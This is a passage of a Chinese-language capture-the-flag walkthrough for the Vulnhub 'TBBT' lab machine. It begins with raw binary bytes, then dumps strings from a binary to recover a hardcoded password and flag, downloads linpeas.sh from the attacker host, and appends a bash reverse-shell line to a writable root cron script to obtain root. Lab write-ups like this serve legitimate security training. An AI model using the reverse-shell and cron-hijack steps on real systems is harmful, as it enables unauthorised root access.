▒S����ã��������t�n�[��5��%
h������%������%h������%▒h▒������%h ������%�f�1�^�����PTRh`hQVh�������f�f�f�f�f�f�f��$�f�f�f�f�f�f��+-(��v▒���tU����h(�Ѓ���Ð�t&�(-(���������t��tU����Ph(����Ít&��'�=(uU����|����(���f�����u듍v���t�U����P����u����L$����q�U��Q��De��E�1���
h����������E�Ph����������
h��x�������E�Ph���������h��E�P�0�������u\�h��E�P�▒�������u2��
h�$�������
h��������
h�������"��
h,����������
h\���������U�e3t������M�ɍa��f�f�f�f�f�f�f��UWVS���������
�l$ ��
����3�������)�����t%1������t$,�t$,U���������9�u���
[^_]Ív��S�������Ó�[�Enter your username:%sEnter your password:amyP@SSw0rd123Sh3ld0n
Login Success!
Soon I will be adding my secrets here..FLAG-amy{60263777358690b90e8dbe8fea6943c9}
Wrong password! YOY WILL NEVER READ MY SECRETS
User doesn't exist(���D{���h����������zR|
����F
J
tx?▒;*2$"(@
���D
GuCu|�
A�C
Hl����]�A
�A�A�N i$D(D,A0M GA�A�
AA�������
▒� T�
���o�L�
�
(���o����o���o���GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609Th�L$� ,�
T�
��
�dxp��
�▒ (▒�
0.�D(▒S
z�������d����
▒#`3E a � w(-d~� �� �$�|��]�,▒��x(▒"�' ;U(a T�
crtstuff.c__JCR_LIST__deregister_tm_clones__do_global_dtors_auxcompleted.7209__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entrysecretdiary.c__FRAME_END____JCR_END____init_array_end_DYNAMIC__init_array_start__GNU_EH_FRAME_HDR_GLOBAL_OFFSET_TABLE___libc_csu_finistrcmp@@GLIBC_2.0_ITM_deregisterTMCloneTable__x86.get_pc_thunk.bx_edata__stack_chk_fail@@GLIBC_2.4__data_startputs@@GLIBC_2.0__gmon_start____dso_handle_IO_stdin_used__libc_start_main@@GLIBC_2.0__libc_csu_init_fp_hw__bss_startmain_Jv_RegisterClasses__isoc99_scanf@@GLIBC_2.7__TMC_END___ITM_registerTMCloneTable.symtab.strtab.shstrtab.interp.note.ABI-tag.note.gnu.build-id.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rel.dyn.rel.plt.init.plt.got.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.jcr.dynamic.got.plt.data.bss.commentT#hh 1��$D���o�� N
��VLL�^���o�k���o��@z �$ B,,(�TT#���`����r�dd�xx��pp,�����
�
������ � ((0(5[
`�/ �{www-data@tbbt:/home/amy$ ls
ls
notes.txt secretdiary
www-data@tbbt:/home/amy$ ^Z
Background channel 0? [y/N] y
meterpreter > download secretdiary
[-] stdapi_fs_stat: Operation failed: 1
meterpreter > pwd
/var/www/html/music/wordpress/wp-content/uploads/2022/12
meterpreter > cd /home/amy
meterpreter > download secretdiary
[*] Downloading: secretdiary -> /home/kali/Vulnhub/TBBT/secretdiary
[*] Downloaded 7.31 KiB of 7.31 KiB (100.0%): secretdiary -> /home/kali/Vulnhub/TBBT/secretdiary
[*] download : secretdiary -> /home/kali/Vulnhub/TBBT/secretdiary
meterpreter >
└─$ strings secretdiary
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
__isoc99_scanf
puts
__stack_chk_fail
strcmp
__libc_start_main
__gmon_start__
GLIBC_2.7
GLIBC_2.4
GLIBC_2.0
PTRh`
UWVS
t$,U
[^_]
Enter your username:
Enter your password:
P@SSw0rd123Sh3ld0n
Login Success!
Soon I will be adding my secrets here..
FLAG-amy{60263777358690b90e8dbe8fea6943c9}
Wrong password! YOY WILL NEVER READ MY SECRETS
User doesn't exist
;*2$"(
GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.7209
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
secretdiary.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
strcmp@@GLIBC_2.0
_ITM_deregisterTMCloneTable
__x86.get_pc_thunk.bx
_edata
__stack_chk_fail@@GLIBC_2.4
__data_start
puts@@GLIBC_2.0
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_start_main@@GLIBC_2.0
__libc_csu_init
_fp_hw
__bss_start
main
_Jv_RegisterClasses
__isoc99_scanf@@GLIBC_2.7
__TMC_END__
_ITM_registerTMCloneTable
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rel.dyn
.rel.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got.plt
.data
.bss
.comment
这里发现了密码:P@SSw0rd123Sh3ld0n,但不知道是什么用户名?
将Linpeas.sh脚本上传至目标主机的/tmp目录下,修改权限,并执行脚本,从脚本运行结果看:
www-data@tbbt:/home$ cd /tmp
cd /tmp
www-data@tbbt:/tmp$ wget http://192.168.1.200:8000/linpeas.sh
wget http://192.168.1.200:8000/linpeas.sh
--2022-12-12 04:23:45-- http://192.168.1.200:8000/linpeas.sh
Connecting to 192.168.1.200:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 765823 (748K) [text/x-sh]
Saving to: 'linpeas.sh'
linpeas.sh 100%[===================>] 747.87K --.-KB/s in 0.003s
2022-12-12 04:23:45 (225 MB/s) - 'linpeas.sh' saved [765823/765823]
www-data@tbbt:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@tbbt:/tmp$ ./linpeas.sh
./linpeas.sh
▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄
▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀
▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀
/---------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------|
| Become a Patreon : https://www.patreon.com/peass |
| Follow on Twitter : @carlospolopm |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------/
linpeas-ng by carlospolop
运行结果中的下面内容引起注意:
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
*/1 * * * * root /home/leonard/thermostat_set_temp.py
www-data@tbbt:/home/leonard$ cat thermostat_set_temp.sh
cat thermostat_set_temp.sh
#!/bin/bash
# This script is empty for now, I will code it as soon as I have free time.
# This script will secretly connect to our IoT thermostat and always set the
# temperature in the value I wish overiding Sheldons' settings without him even knowing.
# Even if Sheldon changes the value my script is already configured to run every minute
# and change the value again and again!
# I am so smart
# Now I just have to code it...
# MAKE API CALL TO THERMOSTAT TO SET TEMP_VALUE=22
这个脚本目前是空的,而且任何人对该脚本有读写权限,因此只需将反弹shell语句写入该脚本中,cron会每分钟执行该脚本,从而得到反弹回来的shell,并该shell为root权限:
www-data@tbbt:/home/leonard$ echo 'bash -i >& /dev/tcp/192.168.1.200/6666 0>&1' >> /home/leonard/thermostat_set_temp.sh
<p/192.168.1.200/6666 0>&1' >> /home/leonard/thermostat_set_temp.sh
www-data@tbbt:/home/leonard$
┌──(kali㉿kali)-[~/Vulnhub/TBBT]
└─$ sudo nc -nlvp 6666
[sudo] password for kali:
listening on [any] 6666 ...
connect to [192.168.1.200] from (UNKNOWN) [192.168.1.105] 46558
bash: cannot set terminal process group (22948): Inappropriate ioctl for device
bash: no job control in this shell
root@tbbt:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@tbbt:~# cd /root
cd /root
root@tbbt:~# ls
ls
FLAG-leonard.txt
root@tbbt:~# cat FLAG-lenonard.txt
cat FLAG-lenonard.txt
cat: FLAG-lenonard.txt: No such file or directory
root@tbbt:~# cat FLAG-leonard.txt
cat FLAG-leonard.txt
____
/ \
/______\
||
/~~~~~~~~\ || /~~~~~~~~~~~~~~~~\
/~ () () ~\ || /~ () () () () ~\
(_)========(_) || (_)==== ===========(_)
I|_________|I _||_ |___________________|
.////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Gongrats!
You have rooted the box! Now you can sit on Sheldons spot!
FLAG-leonard{17fc95224b65286941c54747704acd3e}
I hope you liked it!
root@tbbt:~#
成功得到了root flag.
标签:ftp,Mar,FunWithFlags,192.168,xr,2020,Vulnhub,TBBT,txt From: https://www.cnblogs.com/jason-huawen/p/16975539.html